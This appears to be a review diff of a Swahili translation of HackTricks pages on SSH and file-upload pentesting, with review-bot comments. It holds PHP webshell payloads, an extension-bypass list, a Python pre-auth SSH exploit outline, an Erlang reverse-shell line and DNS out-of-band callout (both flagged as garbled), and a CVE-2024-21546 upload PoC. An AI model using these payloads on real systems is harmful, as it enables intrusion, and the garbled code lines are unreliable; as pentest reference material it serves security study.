Ikiwa unataka kupita mtandao kwa kutumia funguo za kibinafsi za SSH zilizogunduliwa kwenye mifumo, ukitumia kila funguo ya kibinafsi kwenye kila mfumo kwa ajili ya mwenyeji mpya, basi [**SSH-Snake**](https://github.com/MegaManSec/SSH-Snake) ndiyo unayohitaji.
Ikiwa unataka kusafiri kupitia mtandao ukitumia SSH private keys ulizogundua kwenye mifumo, ukitumia kila private key kwenye kila mfumo kwa ajili ya hosts mpya, basi [**SSH-Snake**](https://github.com/MegaManSec/SSH-Snake) ndiyo unayohitaji.
SSH-Snake inatekeleza kazi zifuatazo kiotomatiki na kwa kurudiarudia:
SSH-Snake inatekeleza majukumu yafuatayo kimitambo na kirekurensi:
1. Kwenye mfumo wa sasa, pata funguo zozote za kibinafsi za SSH,
2. Kwenye mfumo wa sasa, pata mwenyeji au marudio yoyote (mtumiaji@kuhost) ambayo funguo za kibinafsi zinaweza kukubaliwa,
3. Jaribu kuingia SSH kwenye marudio yote kwa kutumia funguo zote za kibinafsi zilizogunduliwa,
4. Ikiwa marudio yameunganishwa kwa mafanikio, rudia hatua #1 - #4 kwenye mfumo uliounganishwa.
1. Kwenye mfumo wa sasa, tafuta vifunguo vya kibinafsi vya SSH,
2. Kwenye mfumo wa sasa, tafuta hosts au destinations (user@host) ambazo vifunguo vinaweza kukubaliwa,
3. Jaribu ku-SSH kwenye destinations zote ukitumia vifunguo vyote vilivyogunduliwa,
4. Ikiwa destination imefanikiwa kuunganishwa, irudia hatua #1 - #4 kwenye mfumo uliounganishwa.
Ni ya kujirudia kabisa na kujiendeleza -- na haina faili kabisa.
Ni yenye uwezo wa kujirudia na kujieneza yenyewe kabisa -- na haina faili kabisa (completely fileless).
## Config Misconfigurations
## Mipangilio Isiyofaa
### Root login
Ni kawaida kwa seva za SSH kuruhusu kuingia kwa mtumiaji wa root kwa default, ambayo inatoa hatari kubwa ya usalama. **Kuzima kuingia kwa root** ni hatua muhimu katika kulinda seva. Upatikanaji usioidhinishwa na mamlaka ya utawala na mashambulizi ya nguvu yanaweza kupunguziliwa mbali kwa kufanya mabadiliko haya.
Ni kawaida kwa server za SSH kuruhusu kuingia kwa mtumiaji root kwa chaguo-msingi, jambo ambalo ni hatari kubwa ya usalama. **Kuizima root login** ni hatua muhimu katika kuimarisha server. Ufikiaji usioidhinishwa kwa vibali vya utawala na mashambulio ya brute force yanaweza kupunguzwa kwa kufanya mabadiliko haya.
**Ili Kuzima Kuingia kwa Root katika OpenSSH:**
To Disable Root Login in OpenSSH:
1. **Hariri faili ya usanidi ya SSH** kwa: `sudoedit /etc/ssh/sshd_config`
2. **Badilisha mipangilio** kutoka `#PermitRootLogin yes` hadi **`PermitRootLogin no`**.
3. **Reload usanidi** kwa kutumia: `sudo systemctl daemon-reload`
4. **Restart seva ya SSH** ili kutekeleza mabadiliko: `sudo systemctl restart sshd`
1. **Edit the SSH config file** with: `sudoedit /etc/ssh/sshd_config`
2. **Change the setting** from `#PermitRootLogin yes` to **`PermitRootLogin no`**.
3. **Reload the configuration** using: `sudo systemctl daemon-reload`
4. **Restart the SSH server** to apply changes: `sudo systemctl restart sshd`
### SFTP Brute Force
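Review bot: "DNS spoofin" in "ARP spoofing, DNS spoofin au nyingine" is a new typo (the replaced line had "DNS spoofing"). The root-login how-to is also reverted from Swahili to English: "To Disable Root Login in OpenSSH:" and the four numbered steps ("**Edit the SSH config file** with: ...", "**Change the setting** from ...") replace lines that were already fully translated; keep the Swahili steps, which were correct, including the `PermitRootLogin no` setting. The added parenthetical "(completely fileless)" after "haina faili kabisa" is redundant and can go.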
@ -197,9 +217,9 @@ Ni kawaida kwa seva za SSH kuruhusu kuingia kwa mtumiaji wa root kwa default, am
### SFTP command execution
Kuna makosa ya kawaida yanayotokea na mipangilio ya SFTP, ambapo wasimamizi wanakusudia kwa watumiaji kubadilishana faili bila kuwezesha ufikiaji wa shell ya mbali. Licha ya kuweka watumiaji na shells zisizoingiliana (k.m., `/usr/bin/nologin`) na kuwafunga kwenye directory maalum, kuna pengo la usalama. **Watumiaji wanaweza kupita vizuizi hivi** kwa kuomba utekelezaji wa amri (kama `/bin/bash`) mara tu baada ya kuingia, kabla shell yao isiyoingiliana haijachukua. Hii inaruhusu utekelezaji wa amri zisizoidhinishwa, ikikandamiza hatua za usalama zilizokusudiwa.
Kuna upotevu wa usalama unaotokea mara kwa mara katika maandalizi ya SFTP, ambapo watawala wanakusudia watumiaji kubadilishana faili bila kuwezesha ufikiaji wa shell ya mbali. Licha ya kuweka watumiaji na shells zisizo za mwingiliano (kwa mfano, `/usr/bin/nologin`) na kuwapangia kwenye saraka maalum, kuna mgongano wa usalama. **Watumiaji wanaweza kuepuka vikwazo hivi** kwa kuomba utekelezaji wa amri (kama `/bin/bash`) mara tu baada ya kuingia, kabla shell yao isiyo ya mwingiliano haijachukua nafasi. Hii inaruhusu utekelezaji wa amri bila idhini, na kuharibu hatua za usalama zilizokusudiwa.
[Esampuli kutoka hapa](https://community.turgensec.com/ssh-hacking-guide/):
[Example from here](https://community.turgensec.com/ssh-hacking-guide/):
```bash
ssh -v noraj@192.168.1.94 id
...
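Review bot: "upotevu wa usalama" ("loss of security") is a less accurate rendering of the oversight described than the replaced "makosa ya kawaida"; the sentence is about a common misconfiguration, not a loss. The link line is reverted to English "[Example from here]" where the old line had Swahili with a typo ("Esampuli"); the right fix is "[Mfano kutoka hapa]", not the English.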
@ -232,42 +252,42 @@ PermitTunnel no
X11Forwarding no
PermitTTY no
```
Hii usanidi itaruhusu tu SFTP: kuzuia ufikiaji wa shell kwa kulazimisha amri ya kuanzisha na kuzuia ufikiaji wa TTY lakini pia kuzuia aina zote za upitishaji bandari au tunneling.
Usanidi huu utaruhusu SFTP pekee: unazuia ufikiaji wa shell kwa kulazimisha start command na kuzuia ufikiaji wa TTY, lakini pia unazuia aina zote za port forwarding au tunneling.
### SFTP Tunneling
Ikiwa una ufikiaji wa seva ya SFTP unaweza pia kupitisha trafiki yako kupitia hii kwa mfano ukitumia upitishaji bandari wa kawaida:
Ikiwa una ufikiaji wa seva ya SFTP, unaweza pia tunnel trafiki yako kupitia hii — kwa mfano kwa kutumia port forwarding ya kawaida:
```bash
sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>
```
### SFTP Symlink
The **sftp** have the command "**symlink**". Therefor, if you have **writable rights** in some folder, you can create **symlinks** of **other folders/files**. As you are probably **trapped** inside a chroot this **won't be specially useful** for you, but, if you can **access** the created **symlink** from a **no-chroot** **service** (for example, if you can access the symlink from the web), you could **open the symlinked files through the web**.
**sftp** ina amri "**symlink**". Kwa hiyo, ikiwa una **ruhusa za kuandika** katika folda fulani, unaweza kuunda **symlinks** za **folda/faili nyingine**. Kwa kuwa labda ume**zuiliwa** ndani ya chroot, hili **haitakuwa hasa la manufaa** kwako; lakini, ikiwa unaweza **kufikia** **symlink** iliyoundwa kutoka kwa **no-chroot** **huduma** (kwa mfano, ikiwa unaweza kufikia symlink kutoka kwenye mtandao), unaweza **kufungua faili zilizounganishwa kwa symlink kupitia mtandao**.
Kwa mfano, ili kuunda **symlink** kutoka kwa faili mpya **"**_**froot**_**" hadi "**_**/**_**"**:
Kwa mfano, kuunda **symlink** kutoka kwa faili mpya **"**_**froot**_**" hadi "**_**/**_**"**:
```bash
sftp> symlink / froot
```
Ikiwa unaweza kufikia faili "_froot_" kupitia wavuti, utaweza kuorodhesha folda ya mzizi ("/") ya mfumo.
Ikiwa unaweza kufikia faili "_froot_" kupitia wavuti, utaweza kuorodhesha folda ya root ("/") ya mfumo.
### Njia za uthibitishaji
### Mbinu za uthibitishaji
Katika mazingira ya usalama wa juu, ni kawaida kuwezesha tu uthibitishaji wa msingi wa funguo au uthibitishaji wa hatua mbili badala ya uthibitishaji wa msingi wa nenosiri rahisi. Lakini mara nyingi njia za uthibitishaji zenye nguvu zinawezeshwa bila kuzima zile dhaifu. Kesi ya kawaida ni kuwezesha `publickey` kwenye usanidi wa openSSH na kuipanga kama njia ya default lakini bila kuzima `password`. Hivyo kwa kutumia hali ya verbose ya mteja wa SSH, mshambuliaji anaweza kuona kwamba njia dhaifu imewezeshwa:
Katika mazingira yenye usalama wa juu, kawaida ni kuwezesha uthibitishaji unaotegemea funguo pekee au uthibitishaji wa vipengele viwili badala ya uthibitishaji rahisi unaotegemea nywila. Lakini mara nyingi mbinu zenye nguvu zaidi zinawezeshwa bila kuzima zile dhaifu. Mfano wa kawaida ni kuwezesha `publickey` katika usanidi wa openSSH na kuiweka kama njia ya chaguo-msingi lakini kutokuzima `password`. Kwa hivyo kwa kutumia verbose mode ya SSH client mshambuliaji anaweza kuona kwamba njia dhaifu imewezeshwa:
```bash
ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
```
Kwa mfano, ikiwa kikomo cha kushindwa kwa uthibitishaji kimewekwa na hujapata nafasi ya kufikia njia ya nywila, unaweza kutumia chaguo la `PreferredAuthentications` kulazimisha kutumia njia hii.
Kwa mfano, ikiwa authentication failure limit imewekwa na haupati fursa ya kufikia password method, unaweza kutumia chaguo la `PreferredAuthentications` kulazimisha kutumia method hii.
```bash
ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password
```
Kukagua usanidi wa seva ya SSH ni muhimu ili kuhakikisha kwamba njia pekee zinazotarajiwa zimeidhinishwa. Kutumia hali ya verbose kwenye mteja kunaweza kusaidia kuona ufanisi wa usanidi.
Mapitio ya usanidi wa SSH server ni muhimu ili kuhakikisha kwamba njia zinazotarajiwa pekee ndizo zimeruhusiwa. Kutumia verbose mode kwenye client kunaweza kusaidia kuona ufanisi wa usanidi.
### Config files
### Faili za usanidi
```bash
ssh_config
sshd_config
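Review bot: The SFTP Symlink paragraph is newly translated, but it renders "from the web" as "kutoka kwenye mtandao" (network) and "through the web" as "kupitia mtandao", while the sentence right after the `symlink / froot` example uses "kupitia wavuti" for the same idea; use "wavuti" in both so the reader understands the symlink is reached via the web service, not the network in general. The tunneling sentence also introduces an em-dash ("kupitia hii — kwa mfano") that the rest of the file does not use; a comma or "kwa mfano" alone reads more naturally.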
@ -283,20 +303,20 @@ id_rsa
## Authentication State-Machine Bypass (Pre-Auth RCE)
Mifumo kadhaa ya seva ya SSH ina kasoro za mantiki katika **mashine ya hali ya uthibitishaji** ambayo inaruhusu mteja kutuma ujumbe wa *protocol ya muunganisho* **kabla** ya uthibitishaji kukamilika. Kwa sababu seva inashindwa kuthibitisha kuwa iko katika hali sahihi, ujumbe hao unashughulikiwa kana kwamba mtumiaji ameidhinishwa kikamilifu, na kusababisha **utendaji wa msimbo usio na uthibitisho** au uundaji wa kikao.
Matoleo kadhaa ya server za SSH yana kasoro za mantiki katika **authentication finite-state machine** zinazomruhusu mteja kutuma ujumbe za *connection-protocol* **kabla** uthibitisho haujakamilika. Kwa sababu server haifanyi uhakiki wa kuwa iko katika hali sahihi, ujumbe hayo yanashughulikiwa kana kwamba mtumiaji ameidhinishwa kabisa, na kusababisha **unauthenticated code execution** au kuunda kikao.
Katika ngazi ya protokali, ujumbe wowote wa SSH wenye _nambari ya ujumbe_ **≥ 80** (0x50) unahusiana na tabaka la *muunganisho* (RFC 4254) na lazima **ukubali tu baada ya uthibitishaji kufanikiwa** (RFC 4252). Ikiwa seva inashughulikia moja ya ujumbe hao wakati bado iko katika hali ya *SSH_AUTHENTICATION*, mshambuliaji anaweza mara moja kuunda channel na kuomba vitendo kama vile utekelezaji wa amri, kuhamasisha bandari, n.k.
Kiwango cha protocol, ujumbe wowote wa SSH wenye _message code_ **≥ 80** (0x50) unahusiana na tabaka la *connection* (RFC 4254) na lazima **ukubaliwe tu baada ya uthibitisho kufanikiwa** (RFC 4252). Ikiwa server itashughulikia mojawapo ya ujumbe huo ilipokuwa bado katika hali ya *SSH_AUTHENTICATION*, mshambuliaji anaweza mara moja kuunda channel na kuomba vitendo kama command execution, port-forwarding, nk.
### Generic Exploitation Steps
1. Establish a TCP connection to the targets SSH port (commonly 22, but other services may expose Erlang/OTP on 2022, 830, 2222…).
2. Craft a raw SSH packet:
1. Tengeneza muunganisho wa TCP kwenye port ya SSH ya lengo (kawaida 22, lakini huduma zingine zinaweza kuonyesha Erlang/OTP kwenye 2022, 830, 2222…).
2. Unda raw SSH packet:
* 4-byte **packet_length** (big-endian)
* 1-byte **message_code** ≥ 80 (e.g. `SSH_MSG_CHANNEL_OPEN` = 90, `SSH_MSG_CHANNEL_REQUEST` = 98)
* Payload that will be understood by the chosen message type
3. Send the packet(s) **before completing any authentication step**.
4. Interact with the server APIs that are now exposed _pre-auth_ (command execution, port forwarding, file-system access, …).
* 1-byte **message_code** ≥ 80 (mf. `SSH_MSG_CHANNEL_OPEN` = 90, `SSH_MSG_CHANNEL_REQUEST` = 98)
* Payload itakayofahamika na aina ya message iliyochaguliwa
3. Tuma packet(s) **kabla ya kumaliza hatua yoyote ya uthibitisho**.
4. Ingiliana na server APIs ambazo sasa zimefunuliwa _pre-auth_ (command execution, port forwarding, file-system access, …).
Python proof-of-concept outline:
Muhtasari wa proof-of-concept wa Python:
```python
import socket, struct
HOST, PORT = '10.10.10.10', 22
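Review bot: Noun-class agreement in the new intro paragraph is off: "kutuma ujumbe za *connection-protocol*" and "ujumbe hayo yanashughulikiwa" should be "ujumbe wa ..." and "ujumbe huo unashughulikiwa", as the following paragraph already does with "ujumbe huo". The same paragraph abbreviates "n.k." as "nk."; the earlier line uses "n.k.", so keep that. The numbered exploitation steps and the "Muhtasari wa proof-of-concept wa Python:" lead-in are otherwise a clean translation of the English they replace, with the message codes (90, 98) and the ≥ 80 boundary preserved.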
@ -308,15 +328,15 @@ pkt = struct.pack('>I', 1) + b'\x5a' # 0x5a = 90
s.sendall(pkt)
# additional CHANNEL_REQUEST packets can follow to run commands
```
Katika mazoezi utahitaji kufanya (au kupuuzia mbali) ubadilishanaji wa funguo kulingana na utekelezaji wa lengo, lakini **hakuna uthibitisho** unaofanywa kamwe.
Katika vitendo utahitaji kufanya (au kupitisha) key-exchange kulingana na utekelezaji wa lengo, lakini **no authentication** haifanyiwi kamwe.
---
### Erlang/OTP `sshd` (CVE-2025-32433)
* **Tofauti zilizokumbwa:** OTP < 27.3.3, 26.2.5.11, 25.3.2.20
* **Sababu ya msingi:** daemoni ya SSH ya asili ya Erlang haitathmini hali ya sasa kabla ya kuita `ssh_connection:handle_msg/2`. Hivyo, pakiti yoyote yenye msimbo wa ujumbe 80-255 inafikia mpangilio wa muunganisho wakati kikao bado kiko katika hali ya *userauth*.
* **Athari:** **utendaji wa msimbo wa mbali usio na uthibitisho** (daemoni kwa kawaida inafanya kazi kama **root** kwenye vifaa vilivyojumuishwa/OT).
* **Affected versions:** OTP < 27.3.3, 26.2.5.11, 25.3.2.20
* **Root cause:** Erlang native SSH daemon haithibitishi hali ya sasa kabla ya kuita `ssh_connection:handle_msg/2`. Kwa hiyo kifurushi chochote chenye message code 80-255 kinawafikia handler wa muunganisho wakati kikao bado kiko katika hali ya *userauth*.
* **Impact:** unauthenticated **remote code execution** (the daemon usually runs as **root** on embedded/OT devices).
Mfano wa mzigo unaozalisha shell ya kurudi iliyounganishwa na channel inayodhibitiwa na mshambuliaji:
Mfano wa payload inayozaa reverse shell bound to the attacker-controlled channel:
```erlang
% open a channel first … then:
execSinet:cmd(Channel, "exec('/bin/sh', ['-i'], [{fd, Channel#channel.fd}, {pid, true}]).").
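Review bot: L768 regresses the sentence it replaces (L767): the English phrase **no authentication** is left inside the Swahili sentence and combined with "haifanyiwi kamwe", which reads as a double negative ("no authentication is never performed"). Keep L767's wording, "lakini **hakuna uthibitisho** unaofanywa kamwe", or write "lakini **uthibitisho haufanyiki kamwe**". Separately, the payload line at L781, `execSinet:cmd(Channel, "exec('/bin/sh', ['-i'], ...)")`, appears as unchanged context but is not valid Erlang module:function syntax and does not match the `exec` channel request the surrounding text describes; worth checking against the original English page before this translation propagates it.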
@ -325,26 +345,28 @@ Blind RCE / out-of-band detection inaweza kufanywa kupitia DNS:
```erlang
execSinet:gethostbyname("<random>.dns.outbound.watchtowr.com").Zsession
```
Detection & Mitigation:
* Inspect SSH traffic: **ondoa pakiti yoyote yenye nambari ya ujumbe ≥ 80 iliyogunduliwa kabla ya uthibitishaji**.
* Upgrade Erlang/OTP to **27.3.3 / 26.2.5.11 / 25.3.2.20** or newer.
* Restrict exposure of management ports (22/2022/830/2222) hasa kwenye vifaa vya OT.
Utambuzi na Kupunguza:
* Inspect SSH traffic: **drop any packet with message code ≥ 80 observed before authentication**.
* Sasisha Erlang/OTP hadi **27.3.3 / 26.2.5.11 / 25.3.2.20** au toleo jipya zaidi.
* Punguza kuonekana kwa bandari za usimamizi (22/2022/830/2222) hasa kwenye vifaa vya OT.
---
### Other Implementations Affected
* **libssh** 0.6 0.8 (server side) **CVE-2018-10933** inakubali `SSH_MSG_USERAUTH_SUCCESS` isiyo na uthibitisho iliyotumwa na mteja, kwa ufanisi ni kasoro ya mantiki kinyume.
### Utekelezaji Mengine Ulioathirika
* **libssh** 0.6 0.8 (server side) **CVE-2018-10933** inakubali `SSH_MSG_USERAUTH_SUCCESS` isiyothibitishwa iliyotumwa na mteja, kwa maana ni kosa la mantiki la kinyume.
Somoo la kawaida ni kwamba mabadiliko yoyote kutoka kwa mabadiliko ya hali yaliyotolewa na RFC yanaweza kuwa na madhara; unapokagua au kufanyia fuzzing SSH daemons zingatia kwa makini *utekelezaji wa mashine ya hali*.
Mafunzo ya kawaida ni kwamba mabadiliko yoyote kutoka kwa mabadiliko ya hali yanayotakiwa na RFC yanaweza kuwa hatari; wakati ukikagua au ukifanya fuzzing ya SSH daemons zingatia hasa *utekelezaji wa mashine ya hali*.
## References
## Marejeo
- [Unit 42 Erlang/OTP SSH CVE-2025-32433](https://unit42.paloaltonetworks.com/erlang-otp-cve-2025-32433/)
- [SSH hardening guides](https://www.ssh-audit.com/hardening_guides.html)
- [Turgensec SSH hacking guide](https://community.turgensec.com/ssh-hacking-guide)
- [Pentesting Kerberos (88) client setup and troubleshooting](pentesting-kerberos-88/README.md)
- [0xdf HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
## HackTricks Automatic Commands
## Amri za Otomatiki za HackTricks
```
Protocol_Name: SSH
Port_Number: 22
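Review bot: the DNS out-of-band snippet at L784, `execSinet:gethostbyname("<random>.dns.outbound.watchtowr.com").Zsession`, looks like extraction residue rather than code: `inet:gethostbyname/1` is the real function, while the `execS` prefix and the trailing `.Zsession` have no meaning in Erlang. Verify the line against the source before merging. On the prose side, L800 renders "any deviation from the RFC-mandated state transitions" as "mabadiliko yoyote kutoka kwa mabadiliko ya hali", which repeats "mabadiliko" with two different meanings; "mkengeuko wowote kutoka kwa mabadiliko ya hali yanayotakiwa na RFC" is clearer.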

View File

@ -1,13 +1,13 @@
# Upakiaji wa Faili
# Kupakia Faili
{{#include ../../banners/hacktricks-training.md}}
## Mbinu Za Jumla za Upakiaji wa Faili
## Mbinu za Jumla za Kupakia Faili
Nyongeza nyingine muhimu:
Other useful extensions:
- **PHP**: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module_
- **Working in PHPv8**: _.php_, _.php4_, _.php5_, .phtml_, .module_, _.inc_, _.hphp_, _.ctp_
- **Working in PHPv8**: _.php_, _.php4_, .php5_, .phtml_, .module_, .inc_, .hphp_, .ctp_
- **ASP**: _.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml_
- **Jsp:** _.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action_
- **Coldfusion:** _.cfm, .cfml, .cfc, .dbm_
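Review bot: L826 drops the opening underscores of the italic markers, so `.php5_`, `.phtml_`, `.module_`, `.inc_`, `.hphp_` and `.ctp_` will render as literal underscores instead of italics. Restore the pairs as in L825: `_.php_, _.php4_, _.php5_, _.phtml_, _.module_, _.inc_, _.hphp_, _.ctp_`.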
@ -15,13 +15,13 @@ Nyongeza nyingine muhimu:
- **Perl**: _.pl, .cgi_
- **Erlang Yaws Web Server**: _.yaws_
### Bypass file extensions checks
### Kupita ukaguzi wa nyongeza za faili
1. Ikiwa inatumika, angalia **nyongeza zilizotajwa hapo awali.** Pia zijaribu kwa kutumia **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Angalia **kuongeza extension halali kabla** ya extension ya utekelezaji (tumia pia nyongeza zilizotajwa hapo awali):_
1. Ikiwa zinatumika, **angalia** **nyongeza zilizotajwa hapo awali.** Pia zipime kwa kutumia **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Angalia **kuongeza nyongeza halali kabla ya** nyongeza ya utekelezaji (tumia pia nyongeza zilizotajwa hapo awali):_
- _file.png.php_
- _file.png.Php5_
3. Jaribu kuongeza **alama maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa tabia zote za **ascii** na **Unicode**. (_Kumbuka kwamba unaweza pia kujaribu kutumia **extensions** zilizotajwa awali_)
3. Jaribu kuongeza **herufi maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa herufi zote za **ASCII** na **Unicode**. (_Kumbuka unaweza pia kujaribu kutumia **nyongeza** zilizotajwa **hapo awali**_)
- _file.php%20_
- _file.php%0a_
- _file.php%00_
@ -31,7 +31,7 @@ Nyongeza nyingine muhimu:
- _file._
- _file.php...._
- _file.pHp5...._
4. Jaribu kupita ulinzi kwa **kufinya extension parser** upande wa server kwa mbinu kama **kuzidisha** extension au **kuongeza data chafu** (byte za **null**) kati ya extensions. _Unaweza pia kutumia **extensions** zilizotajwa awali kutengeneza payload bora._
4. Jaribu kupita vizingiti kwa **kuudanganya extension parser** upande wa server na mbinu kama **kurudia** nyongeza au **kuongeza data zisizohitajika** (byte za **null**) kati ya nyongeza. _Unaweza pia kutumia **nyongeza zilizotajwa hapo awali** kuandaa payload bora._
- _file.png.php_
- _file.png.pHp5_
- _file.php#.png_
@ -40,13 +40,13 @@ Nyongeza nyingine muhimu:
- _file.php%0a.png_
- _file.php%0d%0a.png_
- _file.phpJunk123png_
5. Ongeza **safu nyingine ya extensions** kwa ukaguzi uliopita:
5. Ongeza **tabaka lingine la nyongeza** kwenye ukaguzi uliopita:
- _file.png.jpg.php_
- _file.php%00.png%00.jpg_
6. Jaribu kuweka **extension ya utekelezaji kabla ya extension halali** na uombe kuwa server imepangwa vibaya. (inafaa kutumiwa kwenye misconfigurations ya Apache ambapo chochote chenye extension **.php**, lakini **si lazima kiishie kwa .php**, kitatekeleza code):
6. Jaribu kuweka **nyongeza ya utekelezaji kabla ya nyongeza halali** na uombe server iwe misconfigured. (inafaa kutafuta misconfigurations ya Apache ambapo chochote chenye nyongeza **.php**, hata kama si lazima kinaishie kwa .php, kitaweza kuendesha code):
- _ex: file.php.png_
7. Tumia **NTFS alternate data stream (ADS)** katika **Windows**. Katika kesi hii, herufi kolon ":" itaingizwa baada ya extension iliyoruhusiwa na kabla ya ile iliyoruhusiwa. Kama matokeo, faili tupu yenye extension iliyoruhusiwa itaundwa kwenye server (mfano "file.asax:.jpg"). Faili hii inaweza kuhaririwa baadaye kwa kutumia mbinu nyingine kama kutumia short filename yake. Muundo wa "**::$data**” pia unaweza kutumika kuunda faili zisizo tupu. Kwa hiyo, kuongeza nukta baada ya muundo huu kunaweza kusaidia kupita vikwazo zaidi (.mfano "file.asp::$data.")
8. Jaribu kuvunja mipaka ya jina la faili. Extension halali inakatwa. Na PHP hasidi inabaki. AAA<--SNIP-->AAA.php
7. Kutumia **NTFS alternate data stream (ADS)** katika **Windows**. Katika kesi hii, tabia ya kolon ":" itaingizwa baada ya nyongeza iliyokatazwa na kabla ya ile inayoruhusiwa. Matokeo yake, faili tupu yenye nyongeza iliyokatazwa itaundwa kwenye server (mfano "file.asax:.jpg”). Faili hii inaweza kuhaririwa baadaye kwa mbinu nyingine kama kutumia jina fupi la faili. Muundo "**::$data**” pia unaweza kutumika kuunda faili zisizo tupu. Kwa hivyo, kuongeza nukta baada ya muundo huu pia inaweza kuwa muhimu kupita vikwazo zaidi (mfano "file.asp::$data.”)
8. Jaribu kuvunja mipaka ya jina la faili. Nyongeza halali inakatika. Na PHP hasidi inabaki. AAA<--SNIP-->AAA.php
```
# Linux maximum 255 bytes
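Review bot: L868 mixes straight and curly quotes in the filename examples ("file.asax:.jpg”, "**::$data**” and "file.asp::$data.”), so each example opens with `"` and closes with `”`; use straight quotes throughout, as L866 does, since readers copy these names verbatim. The rest of the rewritten step 7 is an improvement: it correctly says the colon goes after the forbidden extension and before the allowed one, which L866 had backwards.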
@ -61,11 +61,11 @@ AAA<--SNIP 232 A-->AAA.php.png
#### UniSharp Laravel Filemanager pre-2.9.1 (.php. trailing dot) CVE-2024-21546
Baadhi ya upload handlers hupunguza au kuwa-normalize herufi za dot mwishoni kutoka kwenye jina la faili lililosajiliwa. Katika UniSharps Laravel Filemanager (unisharp/laravel-filemanager) matoleo kabla ya 2.9.1, unaweza kupita ukaguzi wa extension kwa:
Baadhi ya upload handlers hukata au ku-normalize nukta za mwisho (trailing dot) kutoka kwa jina la faili lililohifadhiwa. Katika UniSharps Laravel Filemanager (unisharp/laravel-filemanager) toleo kabla ya 2.9.1, unaweza kupita ukaguzi wa nyongeza kwa:
- Kutumia MIME ya picha halali na magic header (kwa mfano, PNGs `\x89PNG\r\n\x1a\n`).
- Kuita faili iliyopakiwa kwa extension ya PHP ikifuatiwa na dot, mfano, `shell.php.`.
- Server huondoa dot ya mwisho na kuhifadhi `shell.php`, ambayo itatekelezwa ikiwa itawekwa kwenye directory inayotumika kwa web (default public storage kama `/storage/files/`).
- Kutumia MIME ya picha halali na magic header (mfano, PNGs `\x89PNG\r\n\x1a\n`).
- Kuiruhusu jina la faili iliyopakuliwa kuwa na nyongeza ya PHP ikifuatiwa na nukta, kwa mfano, `shell.php.`.
- Server hutakata nukta ya mwisho na kuhifadhi `shell.php`, ambayo itaendeshwa ikiwa itakapowekwa katika directory inayotumika kwa web (stora ya umma ya default kama `/storage/files/`).
Minimal PoC (Burp Repeater):
```http
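Review bot: L880 uses "faili iliyopakuliwa" (downloaded file) where the original (L877) talks about the uploaded file; it should be "faili iliyopakiwa". L881 also has a typo, "hutakata" for "hukata" (the server strips the trailing dot).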
@ -80,65 +80,65 @@ Content-Type: image/png
\x89PNG\r\n\x1a\n<?php system($_GET['cmd']??'id'); ?>
------WebKitFormBoundary--
```
Kisha fikia path iliyohifadhiwa (kawaida katika Laravel + LFM):
Kisha fikia njia iliyohifadhiwa (kawaida katika Laravel + LFM):
```
GET /storage/files/0xdf.php?cmd=id
```
Mitigations:
- Upgrade unisharp/laravel-filemanager to ≥ 2.9.1.
- Lazimisha allowlists kali za server-side na thibitisha tena jina la faili lililohifadhiwa.
- Hudumia uploads kutoka maeneo yasiyo-executable.
- Sasisha unisharp/laravel-filemanager hadi ≥ 2.9.1.
- Tekeleza strict server-side allowlists na thibitisha tena persisted filename.
- Serve uploads kutoka maeneo yasiyo-executable.
### Bypass Content-Type, Magic Number, Compression & Resizing
### Kuepuka Content-Type, Magic Number, Compression & Resizing
- Bypass **Content-Type** checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_
- Bypass **Content-Type** checks kwa kuweka **value** ya **Content-Type** **header** kuwa: _image/png_ , _text/plain , application/octet-stream_
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
- Bypass **magic number** check by adding at the beginning of the file the **bytes of a real image** (confuse the _file_ command). Or introduce the shell inside the **metadata**:\
- Bypass **magic number** check kwa kuongeza mwanzoni mwa faili **bytes of a real image** (ili kudanganya amri ya _file_). Au ingiza shell ndani ya **metadata**:\
`exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
`\` or you could also **introduce the payload directly** in an image:\
`\` au unaweza pia **kuingiza payload moja kwa moja** ndani ya image:\
`echo '<?php system($_REQUEST['cmd']); ?>' >> img.png`
- If **compressions is being added to your image**, for example using some standard PHP libraries like [PHP-GD](https://www.php.net/manual/fr/book.image.php), the previous techniques won't be useful it. However, you could use the **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- Ikiwa **compression inayoletwa kwenye image yako**, kwa mfano kwa kutumia maktaba za kawaida za PHP kama [PHP-GD](https://www.php.net/manual/fr/book.image.php), mbinu zilizotangulia hazitatumika. Hata hivyo, unaweza kutumia **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayestahimili compression.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
- The web page cold also be **resizing** the **image**, using for example the PHP-GD functions `imagecopyresized` or `imagecopyresampled`. However, you could use the **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
